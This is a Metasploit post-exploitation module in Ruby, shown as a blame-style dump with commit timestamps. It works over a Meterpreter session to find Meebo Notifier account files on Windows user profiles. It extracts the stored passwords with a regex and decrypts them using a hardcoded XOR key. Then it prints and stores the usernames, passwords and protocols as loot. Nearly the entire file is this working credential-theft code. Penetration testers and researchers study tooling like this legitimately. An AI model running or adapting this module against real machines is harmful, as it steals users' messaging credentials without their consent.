2011-08-11 17:06:56 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-08-11 17:06:56 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/post/windows/user_profiles'
|
2012-10-23 18:24:05 +00:00
|
|
|
require 'msf/core/auxiliary/report'
|
2011-08-11 17:06:56 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Post::Windows::UserProfiles
|
|
|
|
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Windows Gather Meebo Password Extractor',
|
|
|
|
'Description' => %q{
|
|
|
|
This module extracts login account password stored by
|
|
|
|
Meebo Notifier, a desktop version of Meebo's Online Messenger.},
|
|
|
|
'License' => MSF_LICENSE,
|
2011-10-17 03:49:49 +00:00
|
|
|
'Author' =>
|
|
|
|
[
|
2011-08-11 17:06:56 +00:00
|
|
|
'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',
|
|
|
|
'SecurityXploded Team <www.SecurityXploded.com>'
|
|
|
|
],
|
2012-10-23 18:33:01 +00:00
|
|
|
'Platform' => [ 'win' ],
|
2011-08-11 17:06:56 +00:00
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
grab_user_profiles().each do |user|
|
|
|
|
accounts = user['AppData'] + "\\Meebo\\MeeboAccounts.txt"
|
|
|
|
next if user['AppData'] == nil
|
|
|
|
next if accounts.empty?
|
|
|
|
stat = session.fs.file.stat(accounts) rescue nil
|
|
|
|
next if stat.nil?
|
|
|
|
parse_txt(accounts)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def parse_txt(file)
|
|
|
|
begin
|
|
|
|
creds = Rex::Ui::Text::Table.new(
|
|
|
|
'Header' => 'Meebo Instant Messenger Credentials',
|
2011-11-21 23:49:57 +00:00
|
|
|
'Indent' => 1,
|
2011-08-11 17:06:56 +00:00
|
|
|
'Columns' =>
|
|
|
|
[
|
2011-11-15 22:13:51 +00:00
|
|
|
'User',
|
|
|
|
'Password',
|
|
|
|
'Protocol'
|
2011-08-11 17:06:56 +00:00
|
|
|
]
|
|
|
|
)
|
|
|
|
|
|
|
|
config = client.fs.file.new(file,'r')
|
|
|
|
parse = config.read
|
|
|
|
|
|
|
|
if (parse =~ /"password.{5}(.*)",\s*"protocol.{4}(\d),\s*"username.{5}(.*)"/)
|
|
|
|
epass = $1
|
|
|
|
protocol = $2.to_i
|
|
|
|
username = $3
|
|
|
|
else
|
|
|
|
print_status("Regex failed...")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
protocol = "Meebo" if protocol == 0
|
|
|
|
protocol = "AIM" if protocol == 1
|
|
|
|
protocol = "Yahoo IM" if protocol == 2
|
|
|
|
protocol = "Windows Live" if protocol == 3
|
|
|
|
protocol = "Google Talk" if protocol == 4
|
|
|
|
protocol = "ICQ" if protocol == 5
|
|
|
|
protocol = "Jabber" if protocol == 6
|
|
|
|
protocol = "Myspace IM" if protocol == 7
|
|
|
|
|
|
|
|
passwd = decrypt(epass)
|
|
|
|
print_good("*** Protocol: #{protocol} User: #{username} Password: #{passwd} ***")
|
2011-11-15 22:13:51 +00:00
|
|
|
creds << [username, passwd, protocol]
|
2011-08-11 17:06:56 +00:00
|
|
|
config.close
|
|
|
|
|
|
|
|
if passwd == nil or username == nil
|
|
|
|
print_status("Meebo credentials have not been found")
|
|
|
|
else
|
|
|
|
print_status("Storing data...")
|
|
|
|
path = store_loot(
|
|
|
|
'meebo.user.creds',
|
2011-11-15 22:13:51 +00:00
|
|
|
'text/csv',
|
2011-08-11 17:06:56 +00:00
|
|
|
session,
|
2011-11-15 22:13:51 +00:00
|
|
|
creds.to_csv,
|
|
|
|
'meebo_user_creds.csv',
|
2011-08-11 17:06:56 +00:00
|
|
|
'Meebo Notifier User Credentials'
|
|
|
|
)
|
|
|
|
print_status("Meebo Notifier user credentials saved in: #{path}")
|
|
|
|
end
|
|
|
|
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_error("An error has occured: #{e.to_s}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def decrypt (epass)
|
|
|
|
magicarr = [4,240,122,53,65,19,163,124,109,
|
|
|
|
73,187,3,34,93,15,138,11,153,148,147,146,
|
|
|
|
222,129,160,199,104,240,43,89,105,204,236,
|
|
|
|
253,168,96,48,158,143,173,60,215,104,112,
|
|
|
|
149,15,114,107,4,92,149,48,177,42,133,124,
|
|
|
|
152,63,137,2,40,84,131]
|
|
|
|
|
|
|
|
plaintext = [epass].pack("H*").unpack("C*")
|
|
|
|
|
|
|
|
for i in 0 .. plaintext.length-1 do
|
|
|
|
plaintext[i] ^= magicarr[i]
|
|
|
|
end
|
|
|
|
|
|
|
|
return plaintext.pack("C*")
|
|
|
|
end
|
|
|
|
end
|